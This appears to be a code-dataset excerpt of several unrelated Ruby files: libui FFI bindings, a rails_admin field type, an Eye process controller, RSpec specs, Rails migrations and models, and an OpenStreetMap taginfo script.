try_extern 'void uiDrawPathBezierTo(uiDrawPath *p, double c1x, double c1y, double c2x, double c2y, double endX, double endY)'
try_extern 'void uiDrawPathCloseFigure(uiDrawPath *p)'
try_extern 'void uiDrawPathAddRectangle(uiDrawPath *p, double x, double y, double width, double height)'
try_extern 'void uiDrawPathEnd(uiDrawPath *p)'
try_extern 'void uiDrawStroke(uiDrawContext *c, uiDrawPath *path, uiDrawBrush *b, uiDrawStrokeParams *p)'
try_extern 'void uiDrawFill(uiDrawContext *c, uiDrawPath *path, uiDrawBrush *b)'
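# A hypothetical fragment for the Draw callback of an AreaHandler, using the
# path, brush and fill declarations above. `ctx` stands for the uiDrawContext
# taken from the uiAreaDrawParams passed to the callback; values are arbitrary:
#
#   brush = LibUI::FFI::DrawBrush.malloc
#   brush.Type = 0 # solid
#   brush.R = 0.9; brush.G = 0.2; brush.B = 0.2; brush.A = 1.0
#   path = LibUI::FFI.uiDrawNewPath(0) # winding fill mode
#   LibUI::FFI.uiDrawPathAddRectangle(path, 10, 10, 100, 50)
#   LibUI::FFI.uiDrawPathEnd(path)
#   LibUI::FFI.uiDrawFill(ctx, path, brush)
#   LibUI::FFI.uiDrawFreePath(path)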
# uiDrawMatrix
try_extern 'void uiDrawMatrixSetIdentity(uiDrawMatrix *m)'
try_extern 'void uiDrawMatrixTranslate(uiDrawMatrix *m, double x, double y)'
try_extern 'void uiDrawMatrixScale(uiDrawMatrix *m, double xCenter, double yCenter, double x, double y)'
try_extern 'void uiDrawMatrixRotate(uiDrawMatrix *m, double x, double y, double amount)'
try_extern 'void uiDrawMatrixSkew(uiDrawMatrix *m, double x, double y, double xamount, double yamount)'
try_extern 'void uiDrawMatrixMultiply(uiDrawMatrix *dest, uiDrawMatrix *src)'
try_extern 'int uiDrawMatrixInvertible(uiDrawMatrix *m)'
try_extern 'int uiDrawMatrixInvert(uiDrawMatrix *m)'
try_extern 'void uiDrawMatrixTransformPoint(uiDrawMatrix *m, double *x, double *y)'
try_extern 'void uiDrawMatrixTransformSize(uiDrawMatrix *m, double *x, double *y)'
try_extern 'void uiDrawTransform(uiDrawContext *c, uiDrawMatrix *m)'
try_extern 'void uiDrawClip(uiDrawContext *c, uiDrawPath *path)'
try_extern 'void uiDrawSave(uiDrawContext *c)'
try_extern 'void uiDrawRestore(uiDrawContext *c)'
# uiAttribute
try_extern 'void uiFreeAttribute(uiAttribute *a)'
typealias 'uiAttributeType', 'int'
try_extern 'uiAttributeType uiAttributeGetType(const uiAttribute *a)'
try_extern 'uiAttribute *uiNewFamilyAttribute(const char *family)'
try_extern 'const char *uiAttributeFamily(const uiAttribute *a)'
try_extern 'uiAttribute *uiNewSizeAttribute(double size)'
try_extern 'double uiAttributeSize(const uiAttribute *a)'
typealias 'uiTextWeight', 'int'
try_extern 'uiAttribute *uiNewWeightAttribute(uiTextWeight weight)'
try_extern 'uiTextWeight uiAttributeWeight(const uiAttribute *a)'
typealias 'uiTextItalic', 'int'
try_extern 'uiAttribute *uiNewItalicAttribute(uiTextItalic italic)'
try_extern 'uiTextItalic uiAttributeItalic(const uiAttribute *a)'
typealias 'uiTextStretch', 'int'
try_extern 'uiAttribute *uiNewStretchAttribute(uiTextStretch stretch)'
try_extern 'uiTextStretch uiAttributeStretch(const uiAttribute *a)'
try_extern 'uiAttribute *uiNewColorAttribute(double r, double g, double b, double a)'
try_extern 'void uiAttributeColor(const uiAttribute *a, double *r, double *g, double *b, double *alpha)'
try_extern 'uiAttribute *uiNewBackgroundAttribute(double r, double g, double b, double a)'
typealias 'uiUnderline', 'int'
try_extern 'uiAttribute *uiNewUnderlineAttribute(uiUnderline u)'
try_extern 'uiUnderline uiAttributeUnderline(const uiAttribute *a)'
typealias 'uiUnderlineColor', 'int'
try_extern 'uiAttribute *uiNewUnderlineColorAttribute(uiUnderlineColor u, double r, double g, double b, double a)'
try_extern 'void uiAttributeUnderlineColor(const uiAttribute *a, uiUnderlineColor *u, double *r, double *g, double *b, double *alpha)'
# uiOpenTypeFeatures
typealias 'uiOpenTypeFeaturesForEachFunc', 'void*'
try_extern 'uiOpenTypeFeatures *uiNewOpenTypeFeatures(void)'
try_extern 'void uiFreeOpenTypeFeatures(uiOpenTypeFeatures *otf)'
try_extern 'uiOpenTypeFeatures *uiOpenTypeFeaturesClone(const uiOpenTypeFeatures *otf)'
try_extern 'void uiOpenTypeFeaturesAdd(uiOpenTypeFeatures *otf, char a, char b, char c, char d, uint32_t value)'
try_extern 'void uiOpenTypeFeaturesRemove(uiOpenTypeFeatures *otf, char a, char b, char c, char d)'
try_extern 'int uiOpenTypeFeaturesGet(const uiOpenTypeFeatures *otf, char a, char b, char c, char d, uint32_t *value)'
try_extern 'void uiOpenTypeFeaturesForEach(const uiOpenTypeFeatures *otf, uiOpenTypeFeaturesForEachFunc f, void *data)'
try_extern 'uiAttribute *uiNewFeaturesAttribute(const uiOpenTypeFeatures *otf)'
try_extern 'const uiOpenTypeFeatures *uiAttributeFeatures(const uiAttribute *a)'
# uiAttributedString
typealias 'uiAttributedStringForEachAttributeFunc', 'void*'
try_extern 'uiAttributedString *uiNewAttributedString(const char *initialString)'
try_extern 'void uiFreeAttributedString(uiAttributedString *s)'
try_extern 'const char *uiAttributedStringString(const uiAttributedString *s)'
try_extern 'size_t uiAttributedStringLen(const uiAttributedString *s)'
try_extern 'void uiAttributedStringAppendUnattributed(uiAttributedString *s, const char *str)'
try_extern 'void uiAttributedStringInsertAtUnattributed(uiAttributedString *s, const char *str, size_t at)'
try_extern 'void uiAttributedStringDelete(uiAttributedString *s, size_t start, size_t end)'
try_extern 'void uiAttributedStringSetAttribute(uiAttributedString *s, uiAttribute *a, size_t start, size_t end)'
try_extern 'void uiAttributedStringForEachAttribute(const uiAttributedString *s, uiAttributedStringForEachAttributeFunc f, void *data)'
try_extern 'size_t uiAttributedStringNumGraphemes(uiAttributedString *s)'
try_extern 'size_t uiAttributedStringByteIndexToGrapheme(uiAttributedString *s, size_t pos)'
try_extern 'size_t uiAttributedStringGraphemeToByteIndex(uiAttributedString *s, size_t pos)'
# uiFont
FontDescriptor = struct [
'char *Family',
'double Size',
'uiTextWeight Weight',
'uiTextItalic Italic',
'uiTextStretch Stretch'
]
typealias 'uiDrawTextAlign', 'int'
DrawTextLayoutParams = struct [
'uiAttributedString *String',
'uiFontDescriptor *DefaultFont',
'double Width',
'uiDrawTextAlign Align'
]
try_extern 'uiDrawTextLayout *uiDrawNewTextLayout(uiDrawTextLayoutParams *params)'
try_extern 'void uiDrawFreeTextLayout(uiDrawTextLayout *tl)'
try_extern 'void uiDrawText(uiDrawContext *c, uiDrawTextLayout *tl, double x, double y)'
try_extern 'void uiDrawTextLayoutExtents(uiDrawTextLayout *tl, double *width, double *height)'
# uiFontButton
try_extern 'void uiFontButtonFont(uiFontButton *b, uiFontDescriptor *desc)'
try_extern 'void uiFontButtonOnChanged(uiFontButton *b, void (*f)(uiFontButton *, void *), void *data)'
try_extern 'uiFontButton *uiNewFontButton(void)'
try_extern 'void uiFreeFontButtonFont(uiFontDescriptor *desc)'
typealias 'uiModifiers', 'int'
AreaMouseEvent = struct [
'double X',
'double Y',
'double AreaWidth',
'double AreaHeight',
'int Down',
'int Up',
'int Count',
'uiModifiers Modifiers',
'uint64_t Held1To64'
]
typealias 'uiExtKey', 'int'
AreaKeyEvent = struct [
'char Key',
'uiExtKey ExtKey',
'uiModifiers Modifier',
'uiModifiers Modifiers',
'int Up'
]
# uiColorButton
try_extern 'void uiColorButtonColor(uiColorButton *b, double *r, double *g, double *bl, double *a)'
try_extern 'void uiColorButtonSetColor(uiColorButton *b, double r, double g, double bl, double a)'
try_extern 'void uiColorButtonOnChanged(uiColorButton *b, void (*f)(uiColorButton *, void *), void *data)'
try_extern 'uiColorButton *uiNewColorButton(void)'
# uiForm
try_extern 'void uiFormAppend(uiForm *f, const char *label, uiControl *c, int stretchy)'
try_extern 'void uiFormDelete(uiForm *f, int index)'
try_extern 'int uiFormPadded(uiForm *f)'
try_extern 'void uiFormSetPadded(uiForm *f, int padded)'
try_extern 'uiForm *uiNewForm(void)'
typealias 'uiAlign', 'int'
typealias 'uiAt', 'int'
# uiGrid
try_extern 'void uiGridAppend(uiGrid *g, uiControl *c, int left, int top, int xspan, int yspan, int hexpand, uiAlign halign, int vexpand, uiAlign valign)'
try_extern 'void uiGridInsertAt(uiGrid *g, uiControl *c, uiControl *existing, uiAt at, int xspan, int yspan, int hexpand, uiAlign halign, int vexpand, uiAlign valign)'
try_extern 'int uiGridPadded(uiGrid *g)'
try_extern 'void uiGridSetPadded(uiGrid *g, int padded)'
try_extern 'uiGrid *uiNewGrid(void)'
# uiImage
try_extern 'uiImage *uiNewImage(double width, double height)'
try_extern 'void uiFreeImage(uiImage *i)'
try_extern 'void uiImageAppend(uiImage *i, void *pixels, int pixelWidth, int pixelHeight, int byteStride)'
# uiTable
try_extern 'void uiFreeTableValue(uiTableValue *v)'
typealias 'uiTableValueType', 'int'
try_extern 'uiTableValueType uiTableValueGetType(const uiTableValue *v)'
try_extern 'uiTableValue *uiNewTableValueString(const char *str)'
try_extern 'const char *uiTableValueString(const uiTableValue *v)'
try_extern 'uiTableValue *uiNewTableValueImage(uiImage *img)'
try_extern 'uiImage *uiTableValueImage(const uiTableValue *v)'
try_extern 'uiTableValue *uiNewTableValueInt(int i)'
try_extern 'int uiTableValueInt(const uiTableValue *v)'
try_extern 'uiTableValue *uiNewTableValueColor(double r, double g, double b, double a)'
try_extern 'void uiTableValueColor(const uiTableValue *v, double *r, double *g, double *b, double *a)'
TableModelHandler = struct [
'int (*NumColumns)(uiTableModelHandler *, uiTableModel *)',
'uiTableValueType (*ColumnType)(uiTableModelHandler *, uiTableModel *, int)',
'int (*NumRows)(uiTableModelHandler *, uiTableModel *)',
'uiTableValue *(*CellValue)(uiTableModelHandler *mh, uiTableModel *m, int row, int column)',
'void (*SetCellValue)(uiTableModelHandler *, uiTableModel *, int, int, const uiTableValue *)'
]
try_extern 'uiTableModel *uiNewTableModel(uiTableModelHandler *mh)'
try_extern 'void uiFreeTableModel(uiTableModel *m)'
try_extern 'void uiTableModelRowInserted(uiTableModel *m, int newIndex)'
try_extern 'void uiTableModelRowChanged(uiTableModel *m, int index)'
try_extern 'void uiTableModelRowDeleted(uiTableModel *m, int oldIndex)'
TableTextColumnOptionalParams = struct [
'int ColorModelColumn'
]
TableParams = struct [
'uiTableModel *Model',
'int RowBackgroundColorModelColumn'
]
try_extern 'void uiTableAppendTextColumn(uiTable *t, const char *name, int textModelColumn, int textEditableModelColumn, uiTableTextColumnOptionalParams *textParams)'
try_extern 'void uiTableAppendImageColumn(uiTable *t, const char *name, int imageModelColumn)'
try_extern 'void uiTableAppendImageTextColumn(uiTable *t, const char *name, int imageModelColumn, int textModelColumn, int textEditableModelColumn, uiTableTextColumnOptionalParams *textParams)'
try_extern 'void uiTableAppendCheckboxColumn(uiTable *t, const char *name, int checkboxModelColumn, int checkboxEditableModelColumn)'
try_extern 'void uiTableAppendCheckboxTextColumn(uiTable *t, const char *name, int checkboxModelColumn, int checkboxEditableModelColumn, int textModelColumn, int textEditableModelColumn, uiTableTextColumnOptionalParams *textParams)'
try_extern 'void uiTableAppendProgressBarColumn(uiTable *t, const char *name, int progressModelColumn)'
try_extern 'void uiTableAppendButtonColumn(uiTable *t, const char *name, int buttonModelColumn, int buttonClickableModelColumn)'
try_extern 'uiTable *uiNewTable(uiTableParams *params)'
end
end
| 43.161667 | 236 | 0.7185 |
614af909ec26a51c6b773d9804a7b7b9eb00e44f | 266 | require 'rails_admin/config/fields/base'
module RailsAdmin
module Config
module Fields
module Types
class Inet < RailsAdmin::Config::Fields::Base
RailsAdmin::Config::Fields::Types.register(self)
end
end
end
end
end
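# Hypothetical usage in config/initializers/rails_admin.rb, assuming a model
# with a PostgreSQL inet column (model and field names are made up):
#
#   RailsAdmin.config do |config|
#     config.model 'Server' do
#       configure :ip_address, :inet
#     end
#   end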
| 19 | 58 | 0.654135 |
39c71b588af6d83cd3d74c85f0255fe6aa1f978d | 1,134 | module Eye::Process::Controller
# scheduled actions
# :update_config, :start, :stop, :restart, :unmonitor, :monitor, :break_chain, :delete, :signal, :user_command
def start
if load_external_pid_file == :ok
switch :already_running
:ok
else
start_process
end
end
def stop
stop_process
switch :unmonitoring
end
def restart
load_external_pid_file unless pid # unmonitored case
restart_process
end
def monitor
if self[:auto_start]
start
elsif load_external_pid_file == :ok
switch :already_running
else
schedule command: :unmonitor, reason: 'not found'
end
end
def unmonitor
switch :unmonitoring
end
def delete
if self[:stop_on_delete]
info 'process has stop_on_delete option, so sync-stop it first'
stop
end
remove_watchers
remove_children
remove_triggers
terminate
end
def signal(sig = 0)
send_signal(sig) if self.pid
end
def user_command(name)
if self[:user_commands] && c = self[:user_commands][name.to_sym]
execute_user_command(name, c)
end
end
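# A hypothetical illustration of how these actions are queued from elsewhere
# in Eye, mirroring the schedule call used in #monitor above:
#
#   process.schedule command: :restart, reason: 'manual restart'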
end
| 18 | 112 | 0.671076 |
4a7e01b29e6bf98597fe13655b782fd0f5548fb4 | 298 | require 'rails_helper'
RSpec.describe "music_categories/show", type: :view do
before(:each) do
@music_category = assign(:music_category, MusicCategory.create!(
:name => "Name"
))
end
it "renders attributes in <p>" do
render
expect(rendered).to match(/Name/)
end
end
| 19.866667 | 68 | 0.667785 |
e89e5fc36cfc60bcb288b9f52d055234f7618529 | 277 | class ContactMessage < NonPersistentRecord
column :id, :integer
column :author, :string
column :author_email, :string
column :author_phone, :string
column :subject, :string
column :body, :string
validates_presence_of :author, :author_email, :subject, :body
end
| 23.083333 | 63 | 0.747292 |
1d6768e563fe8b7840ab8c2d4284989ad0ce16ce | 436 | require 'rails_helper'
RSpec.describe SponsorsController, type: :controller do
context 'GET #show' do
it 'returns a success response' do
sponsor = Sponsor.create!(name: "Sponsor")
get :show, params: {id: sponsor.to_param}
expect(response).to be_success
end
end
#context 'GET #index' do
# it 'returns a success response' do
# get :index
# expect(response).to be_success
#end
#end
end
| 22.947368 | 55 | 0.662844 |
e8cdecbb564610efc98c7808668054eee9f5ad00 | 166 | class AddBilinguals < ActiveRecord::Migration[5.0]
def change
add_column :leapq_sample_bilinguals, :scene, :string, :limit => 20, :default => 'school'
end
end
| 27.666667 | 91 | 0.722892 |
5dec9a82ab4c75a2c15b50a08e0bbd643fc42c3d | 2,031 | #!/usr/bin/ruby
# This script generates a list of popular shop values - those with more than MIN_COUNT occurrences in the OpenStreetMap database according to taginfo.
# It is useful when creating or updating the list of shops displayed with the generic dot icon.
require 'net/http'
require 'json'
require 'pp'
MIN_COUNT = 100
EXCEPTIONS = [
"no",
"vacant",
"empty",
"disused",
"unknown",
"closed",
"fixme",
"FIXME",
"FixMe",
"other",
"*",
"winery", #see discussion in https://github.com/gravitystorm/openstreetmap-carto/pull/1632
"antique", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"betting", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"delicatessen", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"dive", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"fish", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"gambling", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"insurance", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"pharmacy", #see https://github.com/gravitystorm/openstreetmap-carto/pull/1900
"street_vendor", #see https://github.com/gravitystorm/openstreetmap-carto/issues/2090
"storage_rental", #see https://github.com/gravitystorm/openstreetmap-carto/issues/2090
]
url = URI.parse('http://taginfo.openstreetmap.org/api/4/key/values?key=shop&sortname=count&sortorder=desc')
req = Net::HTTP::Get.new(url.to_s)
res = Net::HTTP.start(url.host, url.port) {|http|
http.request(req)
}
data = JSON.parse(res.body)["data"]
# Get an array of values that only includes values with more than MIN_COUNT occurrences
counted = data.select { |h| h["count"] > MIN_COUNT }.map { |h| h["value"] }
# Filter out empty strings
no_empty = counted.reject { |h| h.strip.empty? }
# Filter out exceptions in EXCEPTIONS
filtered = no_empty - EXCEPTIONS
# Output in SQL style
puts "(" + filtered.map{ |val| "'#{val}'" }.sort.join(", ") + ")"
| 35.631579 | 130 | 0.71935 |
33037e551eb828e1f518c9a73d893605267ae878 | 1,427 | #!/usr/bin/env rspec
shared_examples_for "Puppet::Indirector::FileServerTerminus" do
# This only works if the shared behaviour is included before
# the 'before' block in the including context.
before do
Puppet::FileServing::Configuration.instance_variable_set(:@configuration, nil)
FileTest.stubs(:exists?).returns true
FileTest.stubs(:exists?).with(Puppet[:fileserverconfig]).returns(true)
@path = Tempfile.new("file_server_testing")
path = @path.path
@path.close!
@path = path
Dir.mkdir(@path)
File.open(File.join(@path, "myfile"), "w") { |f| f.print "my content" }
# Use a real mount, so the integration is a bit deeper.
@mount1 = Puppet::FileServing::Configuration::Mount::File.new("one")
@mount1.path = @path
@parser = stub 'parser', :changed? => false
@parser.stubs(:parse).returns("one" => @mount1)
Puppet::FileServing::Configuration::Parser.stubs(:new).returns(@parser)
# Stub out the modules terminus
@modules = mock 'modules terminus'
@request = Puppet::Indirector::Request.new(:indirection, :method, "puppet://myhost/one/myfile")
end
it "should use the file server configuration to find files" do
@modules.stubs(:find).returns(nil)
@terminus.indirection.stubs(:terminus).with(:modules).returns(@modules)
path = File.join(@path, "myfile")
@terminus.find(@request).should be_instance_of(@test_class)
end
end
| 33.97619 | 99 | 0.693763 |
f884335ef55dae495d6fe156acbde79e0a89760e | 1,491 | require 'digest'
RSpec.describe HashComparator::Emails::Analyzer do
let(:subject_plaintext_emails) { ['[email protected]', '[email protected]', '[email protected]'] }
let(:target_hashed_emails) { [hashed_email1, hashed_email2] }
let(:options) { { parsing: { remove_usernames: true } } }
let(:hashed_email1) { Digest::MD5.hexdigest('hello.inc') }
let(:hashed_email2) { Digest::MD5.hexdigest('yahoo.com') }
describe '#find_common_plaintext' do
subject { described_class.find_common_plaintext(hash_function: :md5, subject_plaintext_emails: subject_plaintext_emails, target_hashed_emails: target_hashed_emails, options: options) }
it 'returns the matches in plaintext format' do
expect(subject).to eq ['hello.inc']
end
end
describe '#find_common_hashes' do
subject { described_class.find_common_hashes(hash_function: :md5, subject_plaintext_emails: subject_plaintext_emails, target_hashed_emails: target_hashed_emails, options: options) }
it 'returns the matches in hashed format' do
expect(subject).to eq [hashed_email1]
end
end
describe '#find_full_results' do
subject { described_class.find_full_results(hash_function: :md5, subject_plaintext_emails: subject_plaintext_emails, target_hashed_emails: target_hashed_emails, options: options) }
it 'returns the matches in hashed and plaintext format' do
expect(subject).to eq(common_hashed_emails: [hashed_email1], common_plaintext_emails: ['hello.inc'])
end
end
end | 45.181818 | 188 | 0.760563 |
289df6d14662f98c85245ff952a91872cce47f37 | 466 | class CreateUnitGroupsResources < ActiveRecord::Migration[5.2]
def change
create_table :unit_groups_resources do |t|
t.integer :unit_group_id
t.integer :resource_id
t.index [:unit_group_id, :resource_id], unique: true
t.index [:resource_id, :unit_group_id]
end
reversible do |dir|
dir.up do
execute "ALTER TABLE scripts_resources CONVERT TO CHARACTER SET utf8 COLLATE utf8_unicode_ci"
end
end
end
end
| 27.411765 | 101 | 0.699571 |